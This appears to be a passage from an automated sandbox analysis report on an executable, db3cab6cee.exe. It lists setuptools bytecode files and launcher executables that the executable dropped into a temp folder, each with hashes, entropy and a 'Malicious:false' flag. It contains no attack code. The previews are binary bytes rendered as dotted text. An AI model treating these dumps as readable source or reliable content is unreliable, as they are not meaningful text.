                                                                                                                                            Preview:...........e{..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z...G.d...d...............Z.d...Z.d.d...Z.d.d...Z.d...Z...e.................d.S.)......N)...version.....)...find_module..PY_COMPILED..PY_FROZEN..PY_SOURCE)..._imp)...Requirer......get_module_constant..extract_constantc.....................B.....e.Z.d.Z.d.Z.....d.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....z7A prerequisite to building or installing a distribution..Nc..........................|...|...t...........j.........}.|.....|.|...............}.|...d.}.|.j...............................t.........................................|.`.d.S.).N..__version__).r......Version..__dict__..update..locals..self).r......name..requested_version..module..homepage..attribute..formats.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\depends.py..__init__z.Require.__init__....s[...........>../..;...._.F.......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\discovery.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):31144
                                                                                                                                            Entropy (8bit):5.487330804558882
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:oOp+yOMdgXiOiNd+mQvPA29IteytLa5Uj4t9by:CyH+KNd+bH9QjFa5Uj4tI
                                                                                                                                            MD5:57C80301530D77BD311D15E97C220942
                                                                                                                                            SHA1:8CD3877DCA15ECD2DF6C17DA52C7D1D57A4BFC0B
                                                                                                                                            SHA-256:1B8D2FB3322F6AD9A555F020ABD28E17D2D7F60C6B4A414E7A720DC93674A9C8
                                                                                                                                            SHA-512:840D1FFE2B9E0A9D12E29D5F207A42D7DC0B89F6720AD2FFED9D949C520017DCEC28BEDE024219C9609F8DFBC38EDF1F1B73621F0546ABFC773924BDAF80C2E8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e?Q..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.e.e.j.........f...........Z.e.e.g.e.f...........Z.e.e...........Z.e.j.........j ........Z!e.r.d.d.l"m#Z#..d.e.d.e.f.d...Z$..G.d...d...............Z%..G.d...d.e%..............Z&..G.d...d.e&..............Z'..G.d...d.e%..............Z(..G.d...d.e'..............Z)..G.d...d.e(..............Z*d.e.d.e.d.e.e...........f.d...Z+..G.d...d...............Z,d.e.e...........d.e.e...........f.d...Z-d.e.e...........d.e.e...........f.d ..Z.d.e.e...........d!e.e.e.f...........d"e.d.e.e...........f.d#..Z/d$e.d!e.e.e.f...........d"e.d.e.f.d%..Z0d.e.e...........d&e.d.e.e.e.f...........f.d'..Z1d.S.)(u_...Automatic discovery of Python modules and packages (for inclusion in the.distribution) and other config values...For the purposes of this module, the following nomenclature is used:..- "src-layout": a directory representing a Pyt

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\dist.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64082
                                                                                                                                            Entropy (8bit):5.438506285409036
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ms9wqSLyaaSB1iQMB0L33vOUNWY/vQis5:qaSB1PY07fL3Qn
                                                                                                                                            MD5:CEE9A936793959AF41AE6A6EBBBE4527
                                                                                                                                            SHA1:B3C7D859B66AD3CD206C78B5D3D7313DAADDD82E
                                                                                                                                            SHA-256:FFE3B5B7EEBAF7D7B9271B2817E9636A3B948BEF10B6C199FCC4982E860DB8D0
                                                                                                                                            SHA-512:A2C7B69E04E938E9F6BCCBE6716F763EA567C92726A930611B660E57EC1FE3E521BE291DA8DC8EFFC949C2D1D18C520D5DE38466AFDF285B1DDAF9601B1AAC30
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................R.....d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#..d.d.l.m$Z$..d.d.l%m&Z&..d.d.l%m'Z'..d.d.l(m)Z)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/Z/d.d.l0Z/d.d.l/m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6..d.d.l7m8Z8..d.d.l9Z9d.d.l:m;Z;..d.d.l-m<Z<..d.d.l-m=Z=..e.r.d.d.l>m?Z?....e@d...................e@d.................d...ZAd...ZBd.eCd eCf.d!..ZDd"d#d$eCd e.eC..........f.d%..ZEd"d#d$eCd e.eC..........f.d&..ZFd"d#d$eCd e.e.eC....................f.d'..ZGd"d#d e.eC..........f.d(..ZHd)..ZId*..ZJd+..ZKeLeMf.ZNd,..ZOd-..ZPd...ZQd/..ZRd0..ZSd1..ZTd2..ZUd3..ZVd4..ZWd5..ZXd6..ZYd7..ZZd8..Z[..e3e.j\........j]......................Z^..G.d9..d.e^..............Z]..G.d:..d;e...............Z_d.S.)<..Distribution.....N)...strtobool)...DEBUG....translate_longopt)...iglob)...List..Optional..TYPE_CHECKING)

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\errors.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2976
                                                                                                                                            Entropy (8bit):5.361831503111787
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:lwVml1Z/qdT2R/WoreZ5l2mtgtskt9nrpysnXVj/A0+YPCvhLtt:emlDqN2R/WoreZ5itprYsnR/AWC5Ltt
                                                                                                                                            MD5:3D2046B5C5F471BA31B6A67A314434B4
                                                                                                                                            SHA1:E40D23552E63CF158A5506C3C2172493D1EA8591
                                                                                                                                            SHA-256:4E51C68B1F8BAA38337CF52800E4AD1412A4D080B5DA93F6C9FDB4BF2208776D
                                                                                                                                            SHA-512:CC2632CE0FE66835CFF77FA1771BD85F765CA7FEDE96F00036137C83C2AD470F82F6764F77E33E7A18EE420CE80A88CE926D397C4AF49C21F17A2B5A1F852CAA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................@.....d.Z.d.d.l.m.Z...e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z.e.j.........Z...G.d...d.e.e ..............Z!..G.d...d.e.e ..............Z"d.S.).zCsetuptools.errors..Provides exceptions used by setuptools modules.......)...errorsc...........................e.Z.d.Z.d.Z.d.S.)...RemovedCommandErroraO...Error used for commands that have been removed in setuptools... Since ``setuptools`` is built on ``distutils``, simply removing a command. from ``setuptools`` will make the behavior fall back to ``distutils``; this. error is raised if a command exists in ``distutils`` but has been actively. removed in ``setuptools``.. N....__name__..__module__..__qualname__..__doc__........eC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setupto

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\extension.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6832
                                                                                                                                            Entropy (8bit):5.339207994840267
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:7Gd+5XWC71aLU4gciCBSt93Ud7ZY29U9bKgdj5ne41MeHwLmSZY4A25+SSx8k:C6OGLCBA92NSJ7pQiQA25+SSx8k
                                                                                                                                            MD5:0590470DBE2E65BF49F4BBC3B9CDB751
                                                                                                                                            SHA1:1A0E72BA6871C061C9751D93B540AD61076499AC
                                                                                                                                            SHA-256:EBFCB97F93618B94B004D179C7E4E3E28F30BF25B0F463C075D5671BDC53E159
                                                                                                                                            SHA-512:3FE69349EC8418AD2CB1FF44A710C072ECBD191B844D9A456675AF02E27027B7BE0CF6202D9B7D5E7527E5818322CE8EB78F54C3043C260EF88DA33D3BD0CC29
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d...Z.e.Z...e.e.j.........j.......................Z...G.d...d.e...............Z...G.d...d.e...............Z.d.S.)......N.....)...get_unpatchedc.....................^.....d.}...t...........|.d.g.................j...........d.S.#.t...........$.r...Y.n.w.x.Y.w.d.S.).z0. Return True if Cython can be imported.. z.Cython.Distutils.build_ext..build_ext)...fromlistTF)...__import__r......Exception)...cython_impls.... .hC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\extension.py.._have_cythonr........sP........./.K.........;.+....7..7..7..A..A....t....................................5s..........*...*.c.....................(.......e.Z.d.Z.d.Z...f.d...Z.d...Z...x.Z.S.)...Extensiona..... Describes a single extension module... This means that all source files will be compiled into a single binary file. ``<module path>.<suffix>`` (with ``<module p

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\extern\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4420
                                                                                                                                            Entropy (8bit):5.284730049601188
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jqx/u16O2mYj0olN+6ujA0TmNEBXGvBdgSXg/6aaP2sXc7/ipRZdSmhdxrfubFdf:j6uEpAQKfBWfgjwO+TPJgmNXm
                                                                                                                                            MD5:2A11E360EBE42C052639389FA9E2708B
                                                                                                                                            SHA1:7548D0AD408EF390E184443CA2904B93CD57D304
                                                                                                                                            SHA-256:D6B8ACA42B6AA846061579C4DE79BBBD2136C7BFFE400D1BD019A622C81529E0
                                                                                                                                            SHA-512:4AA2CC84E04C1B065BE3F7105A450978BDC798A9229C5BA8E2365A404D419C91A7CCDE335D455CBF54F5BF6618C03946837A56D27620A2A8C526AE8CC29617C4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................r.....d.d.l.Z.d.d.l.Z...G.d...d...............Z.d.Z...e.e.e.d.....................................................d.S.)......Nc.....................V.....e.Z.d.Z.d.Z.d.d...Z.e.d.................Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d.S.)...VendorImporterz.. A PEP 302 meta path importer for finding optionally-vendored. or otherwise naturally-installed packages from root_name.. ..Nc.....................v.....|.|._.........t...........|...............|._.........|.p.|.......................d.d...............|._.........d.S.).N..extern.._vendor)...root_name..set..vendored_names..replace..vendor_pkg)...selfr....r....r....s.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\extern\__init__.py..__init__z.VendorImporter.__init__....s9......."......!....1..1.......$..N...(9.(9.(.I.(N.(N.............c................#....*...K.....|.j.........d.z...V.....d.V.....d.S.).zL. Search first the ve

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\glob.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6589
                                                                                                                                            Entropy (8bit):5.136748253123854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:jyfdtlQ4yZsvYJaQ4yZsEZatJAiwvu3XJ8p2MuUqluZlhsTwF/UblMIl8L:jyQ7ZbaQ7Z0Ai/JXY/awF/KMIyL
                                                                                                                                            MD5:133BD4AB71B5E05FB8BCE473D47A3C80
                                                                                                                                            SHA1:3F1EC31033B225F0111169DE8A824E71D7631510
                                                                                                                                            SHA-256:0866C34EAFF6C65E7D0759943A825908B869AE986697888D637F0CC348FA5AAD
                                                                                                                                            SHA-512:B7B036F1B6BDCF02CEF086866E9448FB36399938971CA49C4B9A6EE619582E58EEC20F123BF8645F99903D5E68515966B8257238196A6495E748117643DCA50D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...e.j.........d...............Z...e.j.........d...............Z.d...Z.d...Z.d...Z.d.S.).z..Filename globbing utility. Mostly a copy of `glob` from Python 3.5...Changes include:. * `yield from` and PEP3102 `*` removed.. * Hidden files are not ignored.......N)...glob..iglob..escapeFc.....................>.....t...........t...........|.|...............................S.).ay...Return a list of paths matching a pathname pattern... The pattern may contain simple shell-style wildcards a la. fnmatch. However, unlike fnmatch, filenames starting with a. dot are special cases that are not matched by '*' and '?'. patterns... If recursive is true, the pattern '**' will match any files and. zero or more directories and subdirectories.. )...recursive)...listr....)...pathnamer....s.... .cC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\si

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-32.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65536
                                                                                                                                            Entropy (8bit):6.390958988358771
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:nMgEYaPKRsVvd7M826QXqVXDjPXHyRhQcBU+zGqJS967GMctEvdGA9SYxQ:Mg/6/tM8NXDjPX0QWlfGMckTQ
                                                                                                                                            MD5:E97C622B03FB2A2598BF019FBBE29F2C
                                                                                                                                            SHA1:32698BD1D3A0FF6CF441770D1B2B816285068D19
                                                                                                                                            SHA-256:5C1AF46C7300E87A73DACF6CF41CE397E3F05DF6BD9C7E227B4AC59F85769160
                                                                                                                                            SHA-512:DB70C62FB35A8E5B005F13B57C1EBBF6C465F6FF0524422294C43E27FB4AA79379DC1E300AD11DC2354405C43B192AE06B91C0F525A1F2617E4D14673651A87D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S..2...2...2......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q.....................N.......&............@..........................@..............................................4...(.......................................................................@...............@............................text............................... ..`.rdata..h ......."..................@..@.data....+..........................@...................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-64.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):75264
                                                                                                                                            Entropy (8bit):6.114619708611424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:MpsuhGpr4+qQt4O/6LEmo1dFPo6O28E0PTBmf2iBQsdkRQ5WF:MpsgozqC4O/jHxo6l0PTBuJBQbRQ5WF
                                                                                                                                            MD5:2FFC9A24492C0A1AF4D562F0C7608AA5
                                                                                                                                            SHA1:1FD5FF6136FBA36E9EE22598ECD250AF3180EE53
                                                                                                                                            SHA-256:69828C857D4824B9F850B1E0597D2C134C91114B7A0774C41DFFE33B0EB23721
                                                                                                                                            SHA-512:03806D162931B1DCF036A51E753FF073A43664491A3CD2E649E55DD77D5E910F7BCF1E217EB0889EF606457B679428640E975EE227DE941A200F652417BC6D5D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#^..g?..g?..g?..@...d?..g?..:?...p\.c?..ymN.C?..ym_.m?..ymI..?..ym[.f?..Richg?..........PE..d......Q..........#..........l.......+.........@.............................p..................................................................(............`.......................................................................................................text............................... ..`.rdata...).......*..................@..@.data....5... ......................@....pdata.......`......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-arm64.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (GUI) Aarch64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):137728
                                                                                                                                            Entropy (8bit):6.050853967225197
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:fTDQsU/VoMDk9LF+0gbbsTWFN0PBiv3UCqqtqnldS7ur4K+oMXG0nhuasWsMd7M/:fTDVCvDk9LFpxAtqnelK+oDihusoQk
                                                                                                                                            MD5:FCCF856A1C8D866282DB478917AB9976
                                                                                                                                            SHA1:26CBB509EB641143871FD3CF204CDB93FA8189EA
                                                                                                                                            SHA-256:4C416738A0E2FA6AB766CCF1A9B0A80974E733F9615168DD22A069AFA7D5B38D
                                                                                                                                            SHA-512:2BF8FB2D20869162B85F0BE6D671395C4B3AE3F80F57F9A8B11B3A41ECC334B9543CE85317E3F3C02E5411095B9AF2C3B01A9D0D997908CC0A7FE2CF00D4597A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...8K..8K..8K..;J..8K..=J..8K..<J..8K..9J..8K..9K..8K...K..8K.=J..8K.<J..8K.;J..8K).<J..8K).:J..8KRich..8K........PE..d...F.Wa.........."......p...........).........@.............................P............`.....................................................(............0..H............@..H.......................................8...............x............................text...Tn.......p.................. ..`.rdata..............t..............@..@.data...@...........................@....pdata..H....0......................@..@.reloc..H....@......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65536
                                                                                                                                            Entropy (8bit):6.390958988358771
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:nMgEYaPKRsVvd7M826QXqVXDjPXHyRhQcBU+zGqJS967GMctEvdGA9SYxQ:Mg/6/tM8NXDjPX0QWlfGMckTQ
                                                                                                                                            MD5:E97C622B03FB2A2598BF019FBBE29F2C
                                                                                                                                            SHA1:32698BD1D3A0FF6CF441770D1B2B816285068D19
                                                                                                                                            SHA-256:5C1AF46C7300E87A73DACF6CF41CE397E3F05DF6BD9C7E227B4AC59F85769160
                                                                                                                                            SHA-512:DB70C62FB35A8E5B005F13B57C1EBBF6C465F6FF0524422294C43E27FB4AA79379DC1E300AD11DC2354405C43B192AE06B91C0F525A1F2617E4D14673651A87D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S..2...2...2......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q.....................N.......&............@..........................@..............................................4...(.......................................................................@...............@............................text............................... ..`.rdata..h ......."..................@..@.data....+..........................@...................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\installer.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5639
                                                                                                                                            Entropy (8bit):5.3985079348274105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:0OWpWcpGexcLineWUqLQ+ClSUTrhnnkcs:0XpLGgc+neWUqJClSmVnkx
                                                                                                                                            MD5:91B18699F8A84B7B8EA2BB06E5DA5DF9
                                                                                                                                            SHA1:D01A11A14DFB94BF65AC92E6CD6CD284192133A3
                                                                                                                                            SHA-256:C43616C04471F323C8523E4D8C57EFE657065531716043D5C0E2DC106CF3B72B
                                                                                                                                            SHA-512:A927CCB5F5EB0245EB095A7ECBB6BFC90B6ED635EC896DBC1749D0FD5EAE8A3A3E80D82195F4EC11682623FDF9D07E72D9512B6D5EB6E9D22AF9590A7CE48076
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.d.S.)......N)...log)...DistutilsError)...Wheel.....)...SetuptoolsDeprecationWarningc..........................t...........|.t.........................r.|.....................................S.t...........|.t...........t...........f...............s.J...|.S.).z8Ensure find-links option end-up being a list of strings.)...isinstance..str..split..tuple..list)...find_linkss.... .hC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\installer.py.._fixup_find_linksr........sF.........*.c..".."...."...........!..!..!....j.5.$.-..0..0..0..0..0...........c...........................t...........j.........d.t.............................t...........j.........d.................n5#.t...........j.........$.r#..|.......................d.t...........j.........................Y.n.w.x.Y.w.t...........|.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\launch.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1555
                                                                                                                                            Entropy (8bit):5.323855627866773
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:O2vxGjz8V6Z5g3/qDvIgb72m0NoYrVTZaKiFc:JvslMqDTbiSYrVTZpoc
                                                                                                                                            MD5:7885288EE0C515BE44184EA0F8882D72
                                                                                                                                            SHA1:05922AB0359CE8F74790DB3A5469E2642580488C
                                                                                                                                            SHA-256:29797B2C8C29ADFD11AAC27DBD71C12DF4B2C279745F6D3A49E0203C872E2EF2
                                                                                                                                            SHA-512:32FB9C2EDD4664796B21D3D87F95123113A04C2F169298CEABEFC1AF9D5A7447CBADE52E8A1EB57CE710CBC1CE6FBC805482F62101A488794A0FC5981BF88AF9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e,.........................D.....d.Z.d.d.l.Z.d.d.l.Z.d...Z.e.d.k.....r...e.................d.S.d.S.).z[.Launch the Python script on the command line after.setuptools is bootstrapped via import.......Nc..........................t.............t...........j.........d...........}.t...........|.d.d.................}.t...........j.........d.d.............t...........j.........d.d...<...t...........t...........d.t.........................}...|.|...............5.}.|.....................................}.d.d.d.................n.#.1.s.w.x.Y.w...Y.....|.......................d.d...............}.t...........|.|.d...............}.t...........|.|.................d.S.).zP. Run the script in sys.argv[1] as if it had. been invoked naturally.. .......__main__N)...__file__..__name__..__doc__..openz.\r\nz.\n..exec)...__builtins__..sys..argv..dict..getattr..tokenizer......read..replace..compiler....)...script_name..namespace..open_..fid..script..norm_script..codes.... .eC:\Users\

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\logging.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2073
                                                                                                                                            Entropy (8bit):4.903370571721881
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:czkmg4E/m2m2mG1Mq2FgXwhH7SMhjq8i1NadKdbH65VVLGQ7tgMPytjnnJDc:Yem2mVG6dtRq8rIH65/17lPqjJY
                                                                                                                                            MD5:21DC6CEAFE5026633F12A63E98D6DBD0
                                                                                                                                            SHA1:32D274891D58D5467527A72D81B6414D401F51A8
                                                                                                                                            SHA-256:41FC7D4C4E8A4DF664E8D16E843D60D67DDEE7376272CE56BF17EDA6CEE405EE
                                                                                                                                            SHA-512:025373C84DF537705B5A714142161F8B0302D63DE40A73107DF319011C8EE7291B9228B76E58F723C4A39B161D0B9D2932B343F949ADE242F10A2E952ABE0E87
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................<.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d...Z.d...Z.d.S.)......N.....)...monkeyc.....................,.....|.j.........t...........j.........k.....S.).N)...levelno..logging..WARNING)...records.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\logging.py.._not_warningr........s..........>.G.O..+..+.....c...........................t...........j.......................}.|.......................t...........j.........................t...........j.........t...........j.......................}.|.......................t...........................|.|.f.}.t...........j.........d.d.|.t...........j...........................t...........t...........j.........d...............rBt...........j.........t...........t...........j.........d.................t...........j.........t...........j........._.........d.S.d.S.).z.. Configure logging to emit warning and above to stderr. and everything else to stdout. T

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\monkey.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7032
                                                                                                                                            Entropy (8bit):5.307489704496102
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:xQVTY4oexKsqzRSlk4TXMIzewLn/2s7YWnKzGS8GP50DICRqEPQ/aZQJ:xQVk4oecRSlk4TXV7gWKXIqEI/ag
                                                                                                                                            MD5:FBB499EBD72B6A1E6FDAF9C00355FBD0
                                                                                                                                            SHA1:11823D89849E0D3AFBDDDBB435AF06D91A2D6EA3
                                                                                                                                            SHA-256:8388246AEB1C89725701E9CEAF662537548058E5B68D7CCD48BF5980760CC997
                                                                                                                                            SHA-512:9F51B65006FA779035F59395DBB3E4AE7152BCE8DC1D8047813BBCC122119FD7001CF3A22D56AB9CA817FB8B92814DEE27C56316B6F6E0DC2652C6F8EFDF9B11
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.g.Z...d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.S.).z..Monkey patching of distutils.......N)...import_modulec.....................n.....t...........j.......................d.k.....r.|.f.|.j.........z...S.t...........j.........|...............S.).am.... Returns the bases classes for cls sorted by the MRO... Works around an issue on Jython where inspect.getmro will not return all. base classes if multiple classes share the same name. Instead, this. function will return a tuple containing the class itself, and the contents. of cls.__bases__. See https://github.com/pypa/setuptools/issues/1024.. ..Jython)...platform..python_implementation..__bases__..inspect..getmro)...clss.... .eC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\monkey.py.._get_mror........s7............%..'..'.8..3..3....v......%..%....>.#...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\msvc.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64205
                                                                                                                                            Entropy (8bit):5.452728566797058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:YSG5zHMUV96wpQW1fw+Al4JPQSlBW7YHH66wKsy6hBjVIxgdHfvOl9PUSk6dDeSp:4HMUHnxHH21kgdHUUaP
                                                                                                                                            MD5:DA7DE1A8CE48477346DF4EA14C433DED
                                                                                                                                            SHA1:E2B3A86E8A1E696E7BD63CEAA5DBE284F9954828
                                                                                                                                            SHA-256:7A9D7C03CFA7A1893BDADF67B685CFF0477893324D1BC2939D1CC3977BF90385
                                                                                                                                            SHA-512:4955E1425CACE23021907091D2E44188CFEC9D39004464E08B0D77B48948E073452A4CE151B80D933A3A58B0E9CE940DAA5DFFB4367E4957E779A52A35E858E8
                                                                                                                                            Malicious:false
